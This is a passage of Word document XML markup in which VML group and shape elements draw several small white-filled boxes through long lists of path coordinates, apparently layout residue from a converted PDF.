2717,7652,2719,7652,2722,7652,2724,7652,2724,7652,2724,7652,2724,7652,2724,7652,2724,7652,2724,7652,2724,7652,2724,7652,2724,7652,2724,7652,2724,7652,2724,7652,2724,7652,2724,7652,2724,7652,2724,7652,2724,7652,2724,7652,2724,7652,2724,7653,2724,7653,2724,7653,2724,7653,2724,7653,2724,7654,2724,7654,2724,7654,2724,7654,2724,7655,2724,7655,2724,7655,2724,7656,2724,7656,2724,7656,2724,7657,2724,7657,2724,7658,2724,7658,2724,7659,2724,7659,2724,7660,2724,7661,2724,7661,2724,7662,2724,7663,2724,7664,2724,7664,2724,7665,2724,7666,2724,7667,2724,7668,2724,7669,2724,7670,2724,7671,2724,7672,2724,7673,2724,7675,2724,7676,2724,7677,2724,7679,2724,7680,2724,7681,2724,7683,2724,7684,2724,7686,2724,7688,2724,7689,2724,7691,2724,7693,2724,7695,2724,7697,2724,7699,2724,7701,2724,7703,2724,7705,2724,7707,2724,7709,2724,7711,2724,7714,2724,7716,2724,7719,2724,7721,2724,7724,2724,7727,2724,7729,2724,7732,2724,7735,2724,7738,2724,7741,2724,7744,2724,7747,2724,7750,2724,7754,2724,7757,2724,7760,2724,7764,2724,7767,2724,7771,2724,7775,2724,7779,2724,7783,2724,7787,2724,7791,2724,7795,2724,7799,2724,7803,2724,7808,2724,7812,2724,7817,2724,7821,2724,7826,2724,7831,2724,7836,2724,7840,2724,7846,2724,7851,2724,7856,2724,7861,2724,7867,2724,7872,2724,7872,2724,7872,2724,7872,2724,7872,2724,7872,2724,7872,2724,7872,2724,7872,2724,7872,2724,7872,2724,7872,2724,7872,2724,7872,2724,7872,2724,7872,2724,7872,2724,7872,2724,7872,2724,7872,2724,7872,2724,7872,2724,7872,2724,7872,2723,7872,2723,7872,2723,7872,2723,7872,2723,7872,2723,7872,2723,7872,2722,7872,2722,7872,2722,7872,2722,7872,2722,7872,2722,7872,2721,7872,2721,7872,2721,7872,2721,7872,2720,7872,2720,7872,2720,7872,2719,7872,2719,7872,2719,7872,2718,7872,2718,7872,2717,7872,2717,7872,2716,7872,2716,7872,2716,7872,2715,7872,2714,7872,2714,7872,2713,7872,2713,7872,2712,7872,2712,7872,2711,7872,2710,7872,2709,7872,2709,7872,2708,7872,2707,7872,2706,7872,2706,7872,2705,7872,2704,7872,2703,7872,2702,7872,2701,7872,2700,7872,2699,7872,2698,7872,2697,7872,2696,7872,2695,7872,2694,7872,2693,7872,2691,7872,2690,7872,2689,7872,2688,7872,2686,7872,2685,7872,2684,7872,2682,7872,2681,7872,2679,7872,2678,7872,2676,7872,2675,7872,2673,7872,2671,7872,2670,7872,2668,7872,2666,7872,2664,7872,2663,7872,2661,7872,2659,7872,2657,7872,2655,7872,2653,7872,2651,7872,2649,7872,2647,7872,2644,7872,2642,7872,2640,7872,2638,7872,2635,7872,2633,7872,2631,7872,2628,7872,2626,7872,2623,7872,2620,7872,2620,7872,2620,7872,2620,7872,2620,7872,2620,7872,2620,7872,2620,7872,2620,7872,2620,7872,2620,7872,2620,7872,2620,7872,2620,7872,2620,7872,2620,7872,2620,7872,2620,7872,2620,7872,2620,7871,2620,7871,2620,7871,2620,7871,2620,7871,2620,7871,2620,7870,2620,7870,2620,7870,2620,7870,2620,7869,2620,7869,2620,7869,2620,7868,2620,7868,2620,7867,2620,7867,2620,7867,2620,7866,2620,7866,2620,7865,2620,7864,2620,7864,2620,7863,2620,7862,2620,7862,2620,7861,2620,7860,2620,7859,2620,7859,2620,7858,2620,7857,2620,7856,2620,7855,2620,7854,2620,7853,2620,7852,2620,7850,2620,7849,2620,7848,2620,7847,2620,7845,2620,7844,2620,7842,2620,7841,2620,7839,2620,7838,2620,7836,2620,7835,2620,7833,2620,7831,2620,7829,2620,7827,2620,7825,2620,7823,2620,7821,2620,7819,2620,7817,2620,7815,2620,7812,2620,7810,2620,7808,2620,7805,2620,7803,2620,7800,2620,7797,2620,7795,2620,7792,2620,7789,2620,7786,2620,7783,2620,7780,2620,7777,2620,7774,2620,7770,2620,7767,2620,7764,2620,7760,2620,7756,2620,7753,2620,7749,2620,7745,2620,7741,2620,7737,2620,7733,2620,7729,2620,7725,2620,7721,2620,7716,2620,7712,2620,7707,2620,7703,2620,7698,2620,7693,2620,7688,2620,7683,2620,7678,2620,7673,2620,7668,2620,7663,2620,7657,2620,7652e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:109.500pt;margin-top:409.500pt;width:5.500pt;height:11.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2190,8190" coordsize="110,230">
        <v:shape style="position:absolute;left:2190;top:8190;width:110;height:230" coordorigin="2190,8190" coordsize="110,230" path="m2205,8209l2205,8209,2205,8209,2205,8209,2205,8209,2205,8209,2205,8209,2205,8209,2205,8209,2205,8209,2206,8209,2206,8209,2206,8209,2206,8209,2206,8209,2206,8209,2206,8209,2206,8209,2206,8209,2206,8209,2206,8209,2206,8209,2206,8209,2206,8209,2206,8209,2206,8209,2206,8209,2207,8209,2207,8209,2207,8209,2207,8209,2207,8209,2207,8209,2207,8209,2208,8209,2208,8209,2208,8209,2208,8209,2209,8209,2209,8209,2209,8209,2209,8209,2210,8209,2210,8209,2210,8209,2211,8209,2211,8209,2211,8209,2212,8209,2212,8209,2213,8209,2213,8209,2214,8209,2214,8209,2215,8209,2215,8209,2216,8209,2216,8209,2217,8209,2217,8209,2218,8209,2219,8209,2219,8209,2220,8209,2221,8209,2222,8209,2222,8209,2223,8209,2224,8209,2225,8209,2226,8209,2227,8209,2227,8209,2228,8209,2229,8209,2230,8209,2231,8209,2232,8209,2234,8209,2235,8209,2236,8209,2237,8209,2238,8209,2239,8209,2241,8209,2242,8209,2243,8209,2245,8209,2246,8209,2247,8209,2249,8209,2250,8209,2252,8209,2253,8209,2255,8209,2257,8209,2258,8209,2260,8209,2262,8209,2263,8209,2265,8209,2267,8209,2269,8209,2271,8209,2273,8209,2275,8209,2277,8209,2279,8209,2281,8209,2283,8209,2285,8209,2287,8209,2290,8209,2292,8209,2294,8209,2297,8209,2299,8209,2302,8209,2304,8209,2307,8209,2309,8209,2309,8209,2309,8209,2309,8209,2309,8209,2309,8209,2309,8209,2309,8209,2309,8209,2309,8209,2309,8209,2309,8209,2309,8209,2309,8210,2309,8210,2309,8210,2309,8210,2309,8210,2309,8210,2309,8210,2309,8210,2309,8210,2309,8211,2309,8211,2309,8211,2309,8211,2309,8211,2309,8212,2309,8212,2309,8212,2309,8213,2309,8213,2309,8213,2309,8214,2309,8214,2309,8214,2309,8215,2309,8215,2309,8216,2309,8217,2309,8217,2309,8218,2309,8218,2309,8219,2309,8220,2309,8220,2309,8221,2309,8222,2309,8223,2309,8224,2309,8225,2309,8226,2309,8227,2309,8228,2309,8229,2309,8230,2309,8231,2309,8232,2309,8234,2309,8235,2309,8236,2309,8238,2309,8239,2309,8241,2309,8242,2309,8244,2309,8245,2309,8247,2309,8249,2309,8250,2309,8252,2309,8254,2309,8256,2309,8258,2309,8260,2309,8262,2309,8265,2309,8267,2309,8269,2309,8271,2309,8274,2309,8276,2309,8279,2309,8281,2309,8284,2309,8287,2309,8290,2309,8293,2309,8295,2309,8298,2309,8302,2309,8305,2309,8308,2309,8311,2309,8315,2309,8318,2309,8321,2309,8325,2309,8329,2309,8332,2309,8336,2309,8340,2309,8344,2309,8348,2309,8352,2309,8356,2309,8361,2309,8365,2309,8370,2309,8374,2309,8379,2309,8383,2309,8388,2309,8393,2309,8398,2309,8403,2309,8408,2309,8414,2309,8419,2309,8424,2309,8430,2309,8430,2309,8430,2309,8430,2309,8430,2309,8430,2309,8430,2309,8430,2309,8430,2309,8430,2309,8430,2309,8430,2309,8430,2309,8430,2309,8430,2309,8430,2309,8430,2309,8430,2309,8430,2309,8430,2309,8430,2309,8430,2309,8430,2309,8430,2308,8430,2308,8430,2308,8430,2308,8430,2308,8430,2308,8430,2308,8430,2308,8430,2307,8430,2307,8430,2307,8430,2307,8430,2307,8430,2306,8430,2306,8430,2306,8430,2306,8430,2305,8430,2305,8430,2305,8430,2304,8430,2304,8430,2304,8430,2303,8430,2303,8430,2302,8430,2302,8430,2302,8430,2301,8430,2301,8430,2300,8430,2300,8430,2299,8430,2298,8430,2298,8430,2297,8430,2297,8430,2296,8430,2295,8430,2295,8430,2294,8430,2293,8430,2292,8430,2292,8430,2291,8430,2290,8430,2289,8430,2288,8430,2287,8430,2286,8430,2285,8430,2284,8430,2283,8430,2282,8430,2281,8430,2280,8430,2279,8430,2278,8430,2276,8430,2275,8430,2274,8430,2273,8430,2271,8430,2270,8430,2269,8430,2267,8430,2266,8430,2264,8430,2263,8430,2261,8430,2260,8430,2258,8430,2256,8430,2255,8430,2253,8430,2251,8430,2249,8430,2248,8430,2246,8430,2244,8430,2242,8430,2240,8430,2238,8430,2236,8430,2234,8430,2232,8430,2229,8430,2227,8430,2225,8430,2223,8430,2220,8430,2218,8430,2216,8430,2213,8430,2211,8430,2208,8430,2205,8430,2205,8430,2205,8430,2205,8430,2205,8430,2205,8430,2205,8430,2205,8430,2205,8430,2205,8430,2205,8430,2205,8430,2205,8430,2205,8430,2205,8429,2205,8429,2205,8429,2205,8429,2205,8429,2205,8429,2205,8429,2205,8429,2205,8429,2205,8428,2205,8428,2205,8428,2205,8428,2205,8427,2205,8427,2205,8427,2205,8427,2205,8426,2205,8426,2205,8425,2205,8425,2205,8425,2205,8424,2205,8424,2205,8423,2205,8423,2205,8422,2205,8421,2205,8421,2205,8420,2205,8419,2205,8419,2205,8418,2205,8417,2205,8416,2205,8415,2205,8414,2205,8413,2205,8412,2205,8411,2205,8410,2205,8409,2205,8408,2205,8407,2205,8406,2205,8404,2205,8403,2205,8402,2205,8400,2205,8399,2205,8397,2205,8395,2205,8394,2205,8392,2205,8390,2205,8389,2205,8387,2205,8385,2205,8383,2205,8381,2205,8379,2205,8377,2205,8375,2205,8372,2205,8370,2205,8368,2205,8365,2205,8363,2205,8360,2205,8358,2205,8355,2205,8352,2205,8349,2205,8347,2205,8344,2205,8341,2205,8338,2205,8334,2205,8331,2205,8328,2205,8325,2205,8321,2205,8318,2205,8314,2205,8310,2205,8307,2205,8303,2205,8299,2205,8295,2205,8291,2205,8287,2205,8283,2205,8278,2205,8274,2205,8270,2205,8265,2205,8260,2205,8256,2205,8251,2205,8246,2205,8241,2205,8236,2205,8231,2205,8226,2205,8220,2205,8215,2205,8209e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:130.500pt;margin-top:409.500pt;width:5.500pt;height:11.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2610,8190" coordsize="110,230">
        <v:shape style="position:absolute;left:2610;top:8190;width:110;height:230" coordorigin="2610,8190" coordsize="110,230" path="m2620,8209l2620,8209,2620,8209,2620,8209,2620,8209,2620,8209,2620,8209,2620,8209,2620,8209,2620,8209,2620,8209,2620,8209,2620,8209,2621,8209,2621,8209,2621,8209,2621,8209,2621,8209,2621,8209,2621,8209,2621,8209,2621,8209,2621,8209,2621,8209,2621,8209,2621,8209,2621,8209,2621,8209,2622,8209,2622,8209,2622,8209,2622,8209,2622,8209,2622,8209,2623,8209,2623,8209,2623,8209,2623,8209,2624,8209,2624,8209,2624,8209,2624,8209,2625,8209,2625,8209,2625,8209,2626,8209,2626,8209,2626,8209,2627,8209,2627,8209,2628,8209,2628,8209,2629,8209,2629,8209,2630,8209,2630,8209,2631,8209,2631,8209,2632,8209,2632,8209,2633,8209,2634,8209,2634,8209,2635,8209,2636,8209,2637,8209,2637,8209,2638,8209,2639,8209,2640,8209,2641,8209,2642,8209,2642,8209,2643,8209,2644,8209,2645,8209,2646,8209,2647,8209,2649,8209,2650,8209,2651,8209,2652,8209,2653,8209,2654,8209,2656,8209,2657,8209,2658,8209,2660,8209,2661,8209,2662,8209,2664,8209,2665,8209,2667,8209,2668,8209,2670,8209,2672,8209,2673,8209,2675,8209,2677,8209,2678,8209,2680,8209,2682,8209,2684,8209,2686,8209,2688,8209,2690,8209,2692,8209,2694,8209,2696,8209,2698,8209,2700,8209,2702,8209,2705,8209,2707,8209,2709,8209,2712,8209,2714,8209,2717,8209,2719,8209,2722,8209,2724,8209,2724,8209,2724,8209,2724,8209,2724,8209,2724,8209,2724,8209,2724,8209,2724,8209,2724,8209,2724,8209,2724,8209,2724,8209,2724,8210,2724,8210,2724,8210,2724,8210,2724,8210,2724,8210,2724,8210,2724,8210,2724,8210,2724,8211,2724,8211,2724,8211,2724,8211,2724,8211,2724,8212,2724,8212,2724,8212,2724,8213,2724,8213,2724,8213,2724,8214,2724,8214,2724,8214,2724,8215,2724,8215,2724,8216,2724,8217,2724,8217,2724,8218,2724,8218,2724,8219,2724,8220,2724,8220,2724,8221,2724,8222,2724,8223,2724,8224,2724,8225,2724,8226,2724,8227,2724,8228,2724,8229,2724,8230,2724,8231,2724,8232,2724,8234,2724,8235,2724,8236,2724,8238,2724,8239,2724,8241,2724,8242,2724,8244,2724,8245,2724,8247,2724,8249,2724,8250,2724,8252,2724,8254,2724,8256,2724,8258,2724,8260,2724,8262,2724,8265,2724,8267,2724,8269,2724,8271,2724,8274,2724,8276,2724,8279,2724,8281,2724,8284,2724,8287,2724,8290,2724,8293,2724,8295,2724,8298,2724,8302,2724,8305,2724,8308,2724,8311,2724,8315,2724,8318,2724,8321,2724,8325,2724,8329,2724,8332,2724,8336,2724,8340,2724,8344,2724,8348,2724,8352,2724,8356,2724,8361,2724,8365,2724,8370,2724,8374,2724,8379,2724,8383,2724,8388,2724,8393,2724,8398,2724,8403,2724,8408,2724,8414,2724,8419,2724,8424,2724,8430,2724,8430,2724,8430,2724,8430,2724,8430,2724,8430,2724,8430,2724,8430,2724,8430,2724,8430,2724,8430,2724,8430,2724,8430,2724,8430,2724,8430,2724,8430,2724,8430,2724,8430,2724,8430,2724,8430,2724,8430,2724,8430,2724,8430,2724,8430,2723,8430,2723,8430,2723,8430,2723,8430,2723,8430,2723,8430,2723,8430,2722,8430,2722,8430,2722,8430,2722,8430,2722,8430,2722,8430,2721,8430,2721,8430,2721,8430,2721,8430,2720,8430,2720,8430,2720,8430,2719,8430,2719,8430,2719,8430,2718,8430,2718,8430,2717,8430,2717,8430,2716,8430,2716,8430,2716,8430,2715,8430,2714,8430,2714,8430,2713,8430,2713,8430,2712,8430,2712,8430,2711,8430,2710,8430,2709,8430,2709,8430,2708,8430,2707,8430,2706,8430,2706,8430,2705,8430,2704,8430,2703,8430,2702,8430,2701,8430,2700,8430,2699,8430,2698,8430,2697,8430,2696,8430,2695,8430,2694,8430,2693,8430,2691,8430,2690,8430,2689,8430,2688,8430,2686,8430,2685,8430,2684,8430,2682,8430,2681,8430,2679,8430,2678,8430,2676,8430,2675,8430,2673,8430,2671,8430,2670,8430,2668,8430,2666,8430,2664,8430,2663,8430,2661,8430,2659,8430,2657,8430,2655,8430,2653,8430,2651,8430,2649,8430,2647,8430,2644,8430,2642,8430,2640,8430,2638,8430,2635,8430,2633,8430,2631,8430,2628,8430,2626,8430,2623,8430,2620,8430,2620,8430,2620,8430,2620,8430,2620,8430,2620,8430,2620,8430,2620,8430,2620,8430,2620,8430,2620,8430,2620,8430,2620,8430,2620,8430,2620,8429,2620,8429,2620,8429,2620,8429,2620,8429,2620,8429,2620,8429,2620,8429,2620,8429,2620,8428,2620,8428,2620,8428,2620,8428,2620,8427,2620,8427,2620,8427,2620,8427,2620,8426,2620,8426,2620,8425,2620,8425,2620,8425,2620,8424,2620,8424,2620,8423,2620,8423,2620,8422,2620,8421,2620,8421,2620,8420,2620,8419,2620,8419,2620,8418,2620,8417,2620,8416,2620,8415,2620,8414,2620,8413,2620,8412,2620,8411,2620,8410,2620,8409,2620,8408,2620,8407,2620,8406,2620,8404,2620,8403,2620,8402,2620,8400,2620,8399,2620,8397,2620,8395,2620,8394,2620,8392,2620,8390,2620,8389,2620,8387,2620,8385,2620,8383,2620,8381,2620,8379,2620,8377,2620,8375,2620,8372,2620,8370,2620,8368,2620,8365,2620,8363,2620,8360,2620,8358,2620,8355,2620,8352,2620,8349,2620,8347,2620,8344,2620,8341,2620,8338,2620,8334,2620,8331,2620,8328,2620,8325,2620,8321,2620,8318,2620,8314,2620,8310,2620,8307,2620,8303,2620,8299,2620,8295,2620,8291,2620,8287,2620,8283,2620,8278,2620,8274,2620,8270,2620,8265,2620,8260,2620,8256,2620,8251,2620,8246,2620,8241,2620,8236,2620,8231,2620,8226,2620,8220,2620,8215,2620,8209e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:109.500pt;margin-top:436.500pt;width:5.500pt;height:11.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2190,8730" coordsize="110,230">
        <v:shape style="position:absolute;left:2190;top:8730;width:110;height:230" coordorigin="2190,8730" coordsize="110,230" path="m2205,8754l2205,8754,2205,8754,2205,8754,2205,8754,2205,8754,2205,8754,2205,8754,2205,8754,2205,8754,2206,8754,2206,8754,2206,8754,2206,8754,2206,8754,2206,8754,2206,8754,2206,8754,2206,8754,2206,8754,2206,8754,2206,8754,2206,8754,2206,8754,2206,8754,2206,8754,2206,8754,2207,8754,2207,8754,2207,8754,2207,8754,2207,8754,2207,8754,2207,8754,2208,8754,2208,8754,2208,8754,2208,8754,2209,8754,2209,8754,2209,8754,2209,8754,2210,8754,2210,8754,2210,8754,2211,8754,2211,8754,2211,8754,2212,8754,2212,8754,2213,8754,2213,8754,2214,8754,2214,8754,2215,8754,2215,8754,2216,8754,2216,8754,2217,8754,2217,8754,2218,8754,2219,8754,2219,8754,2220,8754,2221,8754,2222,8754,2222,8754,2223,8754,2224,8754,2225,8754,2226,8754,2227,8754,2227,8754,2228,8754,2229,8754,2230,8754,2231,8754,2232,8754,2234,8754,2235,8754,2236,8754,2237,8754,2238,8754,2239,8754,2241,8754,2242,8754,2243,8754,2245,8754,2246,8754,2247,8754,2249,8754,2250,8754,2252,8754,2253,8754,2255,8754,2257,8754,2258,8754,2260,8754,2262,8754,2263,8754,2265,8754,2267,8754,2269,8754,2271,8754,2273,8754,2275,8754,2277,8754,2279,8754,2281,8754,2283,8754,2285,8754,2287,8754,2290,8754,2292,8754,2294,8754,2297,8754,2299,8754,2302,8754,2304,8754,2307,8754,2309,8754,2309,8754,2309,8754,2309,8754,2309,8754,2309,8754,2309,8754,2309,8754,2309,8754,2309,8754,2309,8754,2309,8754,2309,8754,2309,8754,2309,8754,2309,8754,2309,8754,2309,8754,2309,8755,2309,8755,2309,8755,2309,8755,2309,8755,2309,8755,2309,8756,2309,8756,2309,8756,2309,8756,2309,8757,2309,8757,2309,8757,2309,8757,2309,8758,2309,8758,2309,8759,2309,8759,2309,8760,2309,8760,2309,8761,2309,8761,2309,8762,2309,8762,2309,8763,2309,8764,2309,8764,2309,8765,2309,8766,2309,8767,2309,8768,2309,8768,2309,8769,2309,8770,2309,8771,2309,8772,2309,8773,2309,8775,2309,8776,2309,8777,2309,8778,2309,8779,2309,8781,2309,8782,2309,8784,2309,8785,2309,8787,2309,8788,2309,8790,2309,8792,2309,8793,2309,8795,2309,8797,2309,8799,2309,8801,2309,8803,2309,8805,2309,8807,2309,8809,2309,8811,2309,8814,2309,8816,2309,8818,2309,8821,2309,8823,2309,8826,2309,8829,2309,8831,2309,8834,2309,8837,2309,8840,2309,8843,2309,8846,2309,8849,2309,8853,2309,8856,2309,8859,2309,8863,2309,8866,2309,8870,2309,8873,2309,8877,2309,8881,2309,8885,2309,8889,2309,8893,2309,8897,2309,8901,2309,8905,2309,8910,2309,8914,2309,8919,2309,8923,2309,8928,2309,8933,2309,8938,2309,8943,2309,8948,2309,8953,2309,8958,2309,8963,2309,8969,2309,8974,2309,8974,2309,8974,2309,8974,2309,8974,2309,8974,2309,8974,2309,8974,2309,8974,2309,8974,2309,8974,2309,8974,2309,8974,2309,8974,2309,8974,2309,8974,2309,8974,2309,8974,2309,8974,2309,8974,2309,8974,2309,8974,2309,8974,2309,8974,2308,8974,2308,8974,2308,8974,2308,8974,2308,8974,2308,8974,2308,8974,2308,8974,2307,8974,2307,8974,2307,8974,2307,8974,2307,8974,2306,8974,2306,8974,2306,8974,2306,8974,2305,8974,2305,8974,2305,8974,2304,8974,2304,8974,2304,8974,2303,8974,2303,8974,2302,8974,2302,8974,2302,8974,2301,8974,2301,8974,2300,8974,2300,8974,2299,8974,2298,8974,2298,8974,2297,8974,2297,8974,2296,8974,2295,8974,2295,8974,2294,8974,2293,8974,2292,8974,2292,8974,2291,8974,2290,8974,2289,8974,2288,8974,2287,8974,2286,8974,2285,8974,2284,8974,2283,8974,2282,8974,2281,8974,2280,8974,2279,8974,2278,8974,2276,8974,2275,8974,2274,8974,2273,8974,2271,8974,2270,8974,2269,8974,2267,8974,2266,8974,2264,8974,2263,8974,2261,8974,2260,8974,2258,8974,2256,8974,2255,8974,2253,8974,2251,8974,2249,8974,2248,8974,2246,8974,2244,8974,2242,8974,2240,8974,2238,8974,2236,8974,2234,8974,2232,8974,2229,8974,2227,8974,2225,8974,2223,8974,2220,8974,2218,8974,2216,8974,2213,8974,2211,8974,2208,8974,2205,8974,2205,8974,2205,8974,2205,8974,2205,8974,2205,8974,2205,8974,2205,8974,2205,8974,2205,8974,2205,8974,2205,8974,2205,8974,2205,8974,2205,8974,2205,8974,2205,8974,2205,8974,2205,8974,2205,8974,2205,8974,2205,8973,2205,8973,2205,8973,2205,8973,2205,8973,2205,8972,2205,8972,2205,8972,2205,8972,2205,8971,2205,8971,2205,8970,2205,8970,2205,8970,2205,8969,2205,8969,2205,8968,2205,8968,2205,8967,2205,8967,2205,8966,2205,8965,2205,8965,2205,8964,2205,8963,2205,8962,2205,8962,2205,8961,2205,8960,2205,8959,2205,8958,2205,8957,2205,8956,2205,8955,2205,8954,2205,8953,2205,8951,2205,8950,2205,8949,2205,8948,2205,8946,2205,8945,2205,8943,2205,8942,2205,8940,2205,8938,2205,8937,2205,8935,2205,8933,2205,8931,2205,8930,2205,8928,2205,8926,2205,8924,2205,8921,2205,8919,2205,8917,2205,8915,2205,8912,2205,8910,2205,8907,2205,8905,2205,8902,2205,8900,2205,8897,2205,8894,2205,8891,2205,8888,2205,8885,2205,8882,2205,8879,2205,8876,2205,8873,2205,8869,2205,8866,2205,8862,2205,8859,2205,8855,2205,8851,2205,8847,2205,8844,2205,8840,2205,8836,2205,8831,2205,8827,2205,8823,2205,8819,2205,8814,2205,8810,2205,8805,2205,8800,2205,8795,2205,8791,2205,8786,2205,8781,2205,8775,2205,8770,2205,8765,2205,8759,2205,8754e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:130.500pt;margin-top:436.500pt;width:5.500pt;height:11.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2610,8730" coordsize="110,230">
        <v:shape style="position:absolute;left:2610;top:8730;width:110;height:230" coordorigin="2610,8730" coordsize="110,230" path="m2620,8754l2620,8754,2620,8754,2620,8754,2620,8754,2620,8754,2620,8754,2620,8754,2620,8754,2620,8754,2620,8754,2620,8754,2620,8754,2621,8754,2621,8754,2621,8754,2621,8754,2621,8754,2621,8754,2621,8754,2621,8754,2621,8754,2621,8754,2621,8754,2621,8754,2621,8754,2621,8754,2621,8754,2622,8754,2622,8754,2622,8754,2622,8754,2622,8754,2622,8754,2623,8754,2623,8754,2623,8754,2623,8754,2624,8754,2624,8754,2624,8754,2624,8754,2625,8754,2625,8754,2625,8754,2626,8754,2626,8754,2626,8754,2627,8754,2627,8754,2628,8754,2628,8754,2629,8754,2629,8754,2630,8754,2630,8754,2631,8754,2631,8754,2632,8754,2632,8754,2633,8754,2634,8754,2634,8754,2635,8754,2636,8754,2637,8754,2637,8754,2638,8754,2639,8754,2640,8754,2641,8754,2642,8754,2642,8754,2643,8754,2644,8754,2645,8754,2646,8754,2647,8754,2649,8754,2650,8754,2651,8754,2652,8754,2653,8754,2654,8754,2656,8754,2657,8754,2658,8754,2660,8754,2661,8754,2662,8754,2664,8754,2665,8754,2667,8754,2668,8754,2670,8754,2672,8754,2673,8754,2675,8754,2677,8754,2678,8754,2680,8754,2682,8754,2684,8754,2686,8754,2688,8754,2690,8754,2692,8754,2694,8754,2696,8754,2698,8754,2700,8754,2702,8754,2705,8754,2707,8754,2709,8754,2712,8754,2714,8754,2717,8754,2719,8754,2722,8754,2724,8754,2724,8754,2724,8754,2724,8754,2724,8754,2724,8754,2724,8754,2724,8754,2724,8754,2724,8754,2724,8754,2724,8754,2724,8754,2724,8754,2724,8754,2724,8754,2724,8754,2724,8754,2724,8755,2724,8755,2724,8755,2724,8755,2724,8755,2724,8755,2724,8756,2724,8756,2724,8756,2724,8756,2724,8757,2724,8757,2724,8757,2724,8757,2724,8758,2724,8758,2724,8759,2724,8759,2724,8760,2724,8760,2724,8761,2724,8761,2724,8762,2724,8762,2724,8763,2724,8764,2724,8764,2724,8765,2724,8766,2724,8767,2724,8768,2724,8768,2724,8769,2724,8770,2724,8771,2724,8772,2724,8773,2724,8775,2724,8776,2724,8777,2724,8778,2724,8779,2724,8781,2724,8782,2724,8784,2724,8785,2724,8787,2724,8788,2724,8790,2724,8792,2724,8793,2724,8795,2724,8797,2724,8799,2724,8801,2724,8803,2724,8805,2724,8807,2724,8809,2724,8811,2724,8814,2724,8816,2724,8818,2724,8821,2724,8823,2724,8826,2724,8829,2724,8831,2724,8834,2724,8837,2724,8840,2724,8843,2724,8846,2724,8849,2724,8853,2724,8856,2724,8859,2724,8863,2724,8866,2724,8870,2724,8873,2724,8877,2724,8881,2724,8885,2724,8889,2724,8893,2724,8897,2724,8901,2724,8905,2724,8910,2724,8914,2724,8919,2724,8923,2724,8928,2724,8933,2724,8938,2724,8943,2724,8948,2724,8953,2724,8958,2724,8963,2724,8969,2724,8974,2724,8974,2724,8974,2724,8974,2724,8974,2724,8974,2724,8974,2724,8974,2724,8974,2724,8974,2724,8974,2724,8974,2724,8974,2724,8974,2724,8974,2724,8974,2724,8974,2724,8974,2724,8974,2724,8974,2724,8974,2724,8974,2724,8974,2724,8974,2723,8974,2723,8974,2723,8974,2723,8974,2723,8974,2723,8974,2723,8974,2722,8974,2722,8974,2722,8974,2722,8974,2722,8974,2722,8974,2721,8974,2721,8974,2721,8974,2721,8974,2720,8974,2720,8974,2720,8974,2719,8974,2719,8974,2719,8974,2718,8974,2718,8974,2717,8974,2717,8974,2716,8974,2716,8974,2716,8974,2715,8974,2714,8974,2714,8974,2713,8974,2713,8974,2712,8974,2712,8974,2711,8974,2710,8974,2709,8974,2709,8974,2708,8974,2707,8974,2706,8974,2706,8974,2705,8974,2704,8974,2703,8974,2702,8974,2701,8974,2700,8974,2699,8974,2698,8974,2697,8974,2696,8974,2695,8974,2694,8974,2693,8974,2691,8974,2690,8974,2689,8974,2688,8974,2686,8974,2685,8974,2684,8974,2682,8974,2681,8974,2679,8974,2678,8974,2676,8974,2675,8974,2673,8974,2671,8974,2670,8974,2668,8974,2666,8974,2664,8974,2663,8974,2661,8974,2659,8974,2657,8974,2655,8974,2653,8974,2651,8974,2649,8974,2647,8974,2644,8974,2642,8974,2640,8974,2638,8974,2635,8974,2633,8974,2631,8974,2628,8974,2626,8974,2623,8974,2620,8974,2620,8974,2620,8974,2620,8974,2620,8974,2620,8974,2620,8974,2620,8974,2620,8974,2620,8974,2620,8974,2620,8974,2620,8974,2620,8974,2620,8974,2620,8974,2620,8974,2620,8974,2620,8974,2620,8974,2620,8974,2620,8973,2620,8973,2620,8973,2620,8973,2620,8973,2620,8972,2620,8972,2620,8972,2620,8972,2620,8971,2620,8971,2620,8970,2620,8970,2620,8970,2620,8969,2620,8969,2620,8968,2620,8968,2620,8967,2620,8967,2620,8966,2620,8965,2620,8965,2620,8964,2620,8963,2620,8962,2620,8962,2620,8961,2620,8960,2620,8959,2620,8958,2620,8957,2620,8956,2620,8955,2620,8954,2620,8953,2620,8951,2620,8950,2620,8949,2620,8948,2620,8946,2620,8945,2620,8943,2620,8942,2620,8940,2620,8938,2620,8937,2620,8935,2620,8933,2620,8931,2620,8930,2620,8928,2620,8926,2620,8924,2620,8921,2620,8919,2620,8917,2620,8915,2620,8912,2620,8910,2620,8907,2620,8905,2620,8902,2620,8900,2620,8897,2620,8894,2620,8891,2620,8888,2620,8885,2620,8882,2620,8879,2620,8876,2620,8873,2620,8869,2620,8866,2620,8862,2620,8859,2620,8855,2620,8851,2620,8847,2620,8844,2620,8840,2620,8836,2620,8831,2620,8827,2620,8823,2620,8819,2620,8814,2620,8810,2620,8805,2620,8800,2620,8795,2620,8791,2620,8786,2620,8781,2620,8775,2620,8770,2620,8765,2620,8759,2620,8754e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:109.500pt;margin-top:464.500pt;width:5.500pt;height:11.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2190,9290" coordsize="110,230">
